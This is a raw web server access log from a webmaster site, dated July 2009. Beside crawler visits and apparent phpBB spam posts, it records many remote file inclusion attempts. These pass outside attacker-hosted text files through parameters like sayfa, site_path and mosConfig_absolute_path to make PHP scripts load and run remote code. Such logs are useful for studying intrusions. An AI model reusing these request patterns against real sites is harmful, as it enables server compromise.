211.230.156.161 - - [04/Jul/2009:17:45:52 -0700] "GET /logs/showfile.php/access.log//admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
69.46.23.47 - - [04/Jul/2009:17:46:03 -0700] "POST /phpBB2/posting.php?sid=e71b27cb0ee5c22bc6672b27e0b3c669 HTTP/1.1" 200 13189 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=6390&sid=834ee1fbaf3149b1b4928d05b09a36d6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
208.109.21.238 - - [04/Jul/2009:17:46:24 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
189.90.192.79 - - [04/Jul/2009:17:49:08 -0700] "GET /phpBB2/posting.php?mode=reply&t=1342&sid=109dd760d74e2f7844242b90b6710493 HTTP/1.0" 200 117354 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
77.94.32.34 - - [04/Jul/2009:17:49:36 -0700] "POST /phpBB2/posting.php?sid=81a7aaebf6ca26c145f4384726524fb7 HTTP/1.0" 200 14312 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=reply&t=1342&sid=109dd760d74e2f7844242b90b6710493" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
69.20.70.31 - - [04/Jul/2009:17:51:40 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
65.17.253.220 - - [04/Jul/2009:17:53:50 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
209.235.254.107 - - [04/Jul/2009:17:55:03 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
64.90.164.110 - - [04/Jul/2009:17:55:18 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
94.102.49.213 - - [04/Jul/2009:17:55:32 -0700] "GET /phpBB2/posting.php?mode=quote&p=6390& HTTP/1.1" 200 116817 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "webmaster-showcase.net"
94.102.49.213 - - [04/Jul/2009:17:55:35 -0700] "POST /phpBB2/posting.php?sid=1720f369ebdb5aebde69a398e50ab28a HTTP/1.1" 200 12733 "http://webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=6390&" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "webmaster-showcase.net"
96.31.68.140 - - [04/Jul/2009:17:55:56 -0700] "POST /phpBB2/posting.php?sid=92e01a5a856f18055d46020aa03c8238 HTTP/1.1" 200 13132 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=6390&sid=834ee1fbaf3149b1b4928d05b09a36d6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
212.95.226.66 - - [04/Jul/2009:17:56:09 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
65.60.32.34 - - [04/Jul/2009:17:56:18 -0700] "POST /phpBB2/posting.php?sid=e75b527657eedaeb3177aa2e87baf289 HTTP/1.1" 200 13259 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=6390&sid=834ee1fbaf3149b1b4928d05b09a36d6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
66.232.97.145 - - [04/Jul/2009:17:56:26 -0700] "POST /phpBB2/posting.php?sid=94cb7a33e52bef2fb463a7f8d26245fb HTTP/1.1" 200 13249 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=6390&sid=834ee1fbaf3149b1b4928d05b09a36d6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
62.149.226.208 - - [04/Jul/2009:17:56:55 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
116.121.201.73 - - [04/Jul/2009:17:59:42 -0700] "GET /logs/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 585 "-" "Mozilla/5.0" "webmaster-showcase.net"
116.121.201.73 - - [04/Jul/2009:17:59:43 -0700] "GET /logs/showfile.php/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
116.121.201.73 - - [04/Jul/2009:17:59:43 -0700] "GET /errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 580 "-" "Mozilla/5.0" "webmaster-showcase.net"
116.121.201.73 - - [04/Jul/2009:17:59:43 -0700] "GET /logs/showfile.php/access_090513.log%20%20/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
116.121.201.73 - - [04/Jul/2009:18:00:29 -0700] "GET /logs/showfile.php/access_090315.log%20%20/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
65.55.210.62 - - [04/Jul/2009:18:00:36 -0700] "GET /phpBB2/viewtopic.php?t=90&start=29715 HTTP/1.1" 200 72062 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.webmaster-showcase.net"
65.55.210.62 - - [04/Jul/2009:18:00:36 -0700] "GET /phpBB2/viewtopic.php?t=90&start=29715 HTTP/1.0" 200 72027 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.webmaster-showcase.net"
116.121.201.73 - - [04/Jul/2009:18:01:06 -0700] "GET /logs/showfile.php/access_090513.log/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
208.109.21.238 - - [04/Jul/2009:18:01:24 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
173.58.139.89 - - [04/Jul/2009:18:02:14 -0700] "GET /yahoo/SendMail.php HTTP/1.1" 200 4921 "http://us.2.p2.webhosting.yahoo.com/phpmailsetup" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5" "www.webmaster-showcase.net"
173.58.139.89 - - [04/Jul/2009:18:02:14 -0700] "GET /yahoo/images/c.gif HTTP/1.1" 404 579 "http://www.webmaster-showcase.net/yahoo/SendMail.php" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5" "www.webmaster-showcase.net"
116.121.201.73 - - [04/Jul/2009:18:02:19 -0700] "GET /logs/showfile.php/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
116.121.201.73 - - [04/Jul/2009:18:02:20 -0700] "GET /logs/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 585 "-" "Mozilla/5.0" "webmaster-showcase.net"
116.121.201.73 - - [04/Jul/2009:18:02:20 -0700] "GET /logs/showfile.php/access_090513.log%20%20/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
116.121.201.73 - - [04/Jul/2009:18:02:20 -0700] "GET /errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 404 580 "-" "Mozilla/5.0" "webmaster-showcase.net"
89.223.3.98 - - [04/Jul/2009:18:02:43 -0700] "GET /logs//main.php?sayfa=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 588 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
89.223.3.98 - - [04/Jul/2009:18:02:43 -0700] "GET /logs/showfile.php/access_090523.log//main.php?sayfa=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
89.223.3.98 - - [04/Jul/2009:18:02:43 -0700] "GET /logs//main.php?sayfa=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 588 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
89.223.3.98 - - [04/Jul/2009:18:02:43 -0700] "GET /logs/showfile.php//main.php?sayfa=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
89.223.3.98 - - [04/Jul/2009:18:02:43 -0700] "GET /logs/showfile.php/access_090523.log//main.php?sayfa=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
89.223.3.98 - - [04/Jul/2009:18:02:43 -0700] "GET /main.php?sayfa=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 200 5357 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
89.223.3.98 - - [04/Jul/2009:18:02:43 -0700] "GET /main.php?sayfa=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 200 5274 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
89.223.3.98 - - [04/Jul/2009:18:02:43 -0700] "GET /logs/showfile.php//main.php?sayfa=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
89.223.3.98 - - [04/Jul/2009:18:02:59 -0700] "GET /logs//main.php?sayfa=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 584 "-" "Mozilla/5.0" "webmaster-showcase.net"
89.223.3.98 - - [04/Jul/2009:18:02:59 -0700] "GET /logs/showfile.php//main.php?sayfa=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
89.223.3.98 - - [04/Jul/2009:18:02:59 -0700] "GET /logs/showfile.php/access_090602.log//main.php?sayfa=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
89.223.3.98 - - [04/Jul/2009:18:02:59 -0700] "GET /logs//main.php?sayfa=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 584 "-" "Mozilla/5.0" "webmaster-showcase.net"
89.223.3.98 - - [04/Jul/2009:18:02:59 -0700] "GET /main.php?sayfa=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 200 5278 "-" "Mozilla/5.0" "webmaster-showcase.net"
89.223.3.98 - - [04/Jul/2009:18:02:59 -0700] "GET /logs/showfile.php/access_090602.log//main.php?sayfa=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
89.223.3.98 - - [04/Jul/2009:18:02:59 -0700] "GET /logs/showfile.php//main.php?sayfa=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
89.223.3.98 - - [04/Jul/2009:18:02:59 -0700] "GET /main.php?sayfa=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 200 5272 "-" "Mozilla/5.0" "webmaster-showcase.net"
116.121.201.73 - - [04/Jul/2009:18:03:11 -0700] "GET /logs/showfile.php/access_090315.log%20%20/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
72.30.142.243 - - [04/Jul/2009:18:03:11 -0700] "GET /yahoo/perl.php?d=/usr/lib/perl5/5.8.7/Locale/Codes HTTP/1.0" 200 3114 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.webmaster-showcase.net"
64.150.128.186 - - [04/Jul/2009:18:03:17 -0700] "GET /favicon.ico HTTP/1.1" 404 572 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)" "www.webmaster-showcase.net"
64.150.128.186 - - [04/Jul/2009:18:03:17 -0700] "GET /yahoo/SendMail.php HTTP/1.1" 200 4921 "http://us.1.p4.webhosting.yahoo.com/phpmailsetup" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)" "www.webmaster-showcase.net"
64.150.128.186 - - [04/Jul/2009:18:03:17 -0700] "GET /yahoo/images/c.gif HTTP/1.1" 404 579 "http://www.webmaster-showcase.net/yahoo/SendMail.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)" "www.webmaster-showcase.net"
65.55.106.212 - - [04/Jul/2009:18:03:24 -0700] "GET /robots.txt HTTP/1.1" 404 571 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.webmaster-showcase.net"
64.150.128.186 - - [04/Jul/2009:18:03:27 -0700] "GET /showcode.php HTTP/1.1" 200 46142 "http://www.webmaster-showcase.net/yahoo/SendMail.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)" "www.webmaster-showcase.net"
89.223.3.98 - - [04/Jul/2009:18:03:31 -0700] "GET /logs/showfile.php/access_090523.log%20%20//main.php?sayfa=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
89.223.3.98 - - [04/Jul/2009:18:03:32 -0700] "GET /logs/showfile.php/access_090523.log%20%20//main.php?sayfa=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
116.121.201.73 - - [04/Jul/2009:18:03:41 -0700] "GET /logs/showfile.php/access_090513.log/errors.php?error=http://www.ie.ufrj.br/gema///pokeh.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
89.223.3.98 - - [04/Jul/2009:18:03:45 -0700] "GET /logs/showfile.php/access_090602.log%20%20//main.php?sayfa=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
89.223.3.98 - - [04/Jul/2009:18:03:45 -0700] "GET /logs/showfile.php/access_090602.log%20%20//main.php?sayfa=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
62.175.249.249 - - [04/Jul/2009:18:04:56 -0700] "GET /gb/gbook.php?a=sign HTTP/1.1" 200 3509 "http://www.webmaster-showcase.net/gb/gbook.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
69.46.23.47 - - [04/Jul/2009:18:05:16 -0700] "POST /phpBB2/posting.php?sid=e71b27cb0ee5c22bc6672b27e0b3c669 HTTP/1.1" 200 13171 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=6390&sid=834ee1fbaf3149b1b4928d05b09a36d6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
69.20.70.31 - - [04/Jul/2009:18:06:40 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
89.223.3.98 - - [04/Jul/2009:18:08:05 -0700] "GET /logs/showfile.php/access_090615.log//main.php?sayfa=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
89.223.3.98 - - [04/Jul/2009:18:08:05 -0700] "GET /logs/showfile.php/access_090615.log//main.php?sayfa=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
65.17.253.220 - - [04/Jul/2009:18:08:51 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:18:09:03 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 600 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:18:09:03 -0700] "GET /logs/showfile.php/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:18:09:03 -0700] "GET /logs/showfile.php//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:18:09:03 -0700] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 594 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:18:09:03 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 596 "-" "Mozilla/5.0" "webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:18:09:03 -0700] "GET /logs/showfile.php//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:18:09:03 -0700] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 590 "-" "Mozilla/5.0" "webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:18:09:06 -0700] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 594 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:18:09:06 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 600 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:18:09:06 -0700] "GET /logs/showfile.php//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:18:09:06 -0700] "GET /logs/showfile.php/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:18:09:06 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 596 "-" "Mozilla/5.0" "webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:18:09:06 -0700] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 590 "-" "Mozilla/5.0" "webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:18:09:07 -0700] "GET /logs/showfile.php//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:18:09:07 -0700] "GET /logs/showfile.php/access_090617.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
84.207.17.120 - - [04/Jul/2009:18:09:10 -0700] "GET /logs/showfile.php/access_090617.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "webmaster-showcase.net"
209.235.254.107 - - [04/Jul/2009:18:10:03 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
64.90.164.110 - - [04/Jul/2009:18:10:14 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
65.60.32.34 - - [04/Jul/2009:18:11:03 -0700] "POST /phpBB2/posting.php?sid=e75b527657eedaeb3177aa2e87baf289 HTTP/1.1" 200 13192 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=6390&sid=834ee1fbaf3149b1b4928d05b09a36d6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
66.232.97.145 - - [04/Jul/2009:18:11:05 -0700] "POST /phpBB2/posting.php?sid=94cb7a33e52bef2fb463a7f8d26245fb HTTP/1.1" 200 13289 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=6390&sid=834ee1fbaf3149b1b4928d05b09a36d6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
212.95.226.66 - - [04/Jul/2009:18:11:09 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
96.31.68.140 - - [04/Jul/2009:18:11:12 -0700] "POST /phpBB2/posting.php?sid=92e01a5a856f18055d46020aa03c8238 HTTP/1.1" 200 13152 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=6390&sid=834ee1fbaf3149b1b4928d05b09a36d6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
62.149.226.208 - - [04/Jul/2009:18:11:53 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
65.55.210.69 - - [04/Jul/2009:18:13:16 -0700] "GET /phpBB2/viewtopic.php?t=28740&view=previous HTTP/1.1" 200 336666 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.webmaster-showcase.net"
65.55.109.162 - - [04/Jul/2009:18:14:28 -0700] "GET /phpBB2/viewtopic.php?t=28740&view=previous HTTP/1.0" 200 336555 "http://search.live.com/results.aspx?q=morascorner" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.webmaster-showcase.net"
65.55.109.162 - - [04/Jul/2009:18:14:53 -0700] "GET /phpBB2/templates/subSilver/formIE.css HTTP/1.0" 200 354 "http://www.webmaster-showcase.net/phpBB2/viewtopic.php?t=28740&view=previous" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.webmaster-showcase.net"
208.109.21.238 - - [04/Jul/2009:18:16:24 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
65.55.210.72 - - [04/Jul/2009:18:20:59 -0700] "GET /phpBB2/viewtopic.php?p=162762 HTTP/1.1" 200 71598 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "webmaster-showcase.net"
69.46.23.47 - - [04/Jul/2009:18:21:23 -0700] "POST /phpBB2/posting.php?sid=e71b27cb0ee5c22bc6672b27e0b3c669 HTTP/1.1" 200 13192 "http://www.webmaster-showcase.net/phpBB2/posting.php?mode=quote&p=6390&sid=834ee1fbaf3149b1b4928d05b09a36d6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.webmaster-showcase.net"
69.20.70.31 - - [04/Jul/2009:18:21:42 -0700] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:18:21:44 -0700] "GET /logs/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 585 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:18:21:44 -0700] "GET /logs/showfile.php/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:18:21:44 -0700] "GET /logs/showfile.php/access_090523.log/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:18:21:49 -0700] "GET /include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 593 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:18:21:56 -0700] "GET /include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 593 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:18:21:56 -0700] "GET /logs/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 585 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:18:21:56 -0700] "GET /logs/showfile.php/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:18:21:56 -0700] "GET /logs/showfile.php/access_090523.log/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:18:22:04 -0700] "GET /logs/showfile.php/access_090523.log/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:18:22:04 -0700] "GET /logs/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 585 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:18:22:04 -0700] "GET /logs/showfile.php/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:18:22:04 -0700] "GET /include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 593 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:18:22:04 -0700] "GET /logs/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 585 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:18:22:04 -0700] "GET /include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 593 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:18:22:04 -0700] "GET /logs/showfile.php/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
195.34.78.110 - - [04/Jul/2009:18:22:05 -0700] "GET /logs/showfile.php/access_090523.log/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
93.174.93.58 - - [04/Jul/2009:18:22:12 -0700] "GET /php/simple-php-guestbook/gbook.txt HTTP/1.1" 200 1703936 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:18:22:20 -0700] "GET /logs/include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 585 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
83.98.209.71 - - [04/Jul/2009:18:22:20 -0700] "GET /include/lib.inc.php?site_path=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 593 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
